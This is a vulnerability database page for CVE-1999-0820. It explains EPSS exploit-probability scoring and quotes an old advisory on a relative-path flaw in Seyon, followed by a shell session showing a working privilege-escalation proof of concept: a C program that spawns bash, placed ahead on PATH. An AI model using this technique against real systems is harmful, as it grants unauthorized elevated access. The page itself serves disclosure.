CVE-1999-0820 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/780/info Seyon uses relative pathnames to spawn two other programs which it requires. It is possible to exploit this vulnerability to obtain the priviliges which seyon runs with. It is installed (by default) setgid dialer on FreeBSD and root on Irix. bash-2.03$ uname -a; id; ls -la `which seyon` FreeBSD 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999= = [email protected]:/usr/src/sys/compile/GENERIC i386 uid=1000(xnec) gid=1000(xnec) groups=1000(xnec) -rwxr-sr-x 1 bin dialer 88480 Sep 11 00:55 /usr/X11R6/bin/seyon bash-2.03$ cat > seyonx.c void main () { setregid(getegid(), getegid()); system("/usr/local/bin/bash"); } bash-2.03$ gcc -o seyon-emu seyonx.c bash-2.03$ PATH=.:$PATH bash-2.03$ seyon bash-2.03$ id uid=1000(xnec) gid=68(dialer) groups=68(dialer), 1000(xnec) bash-2.03$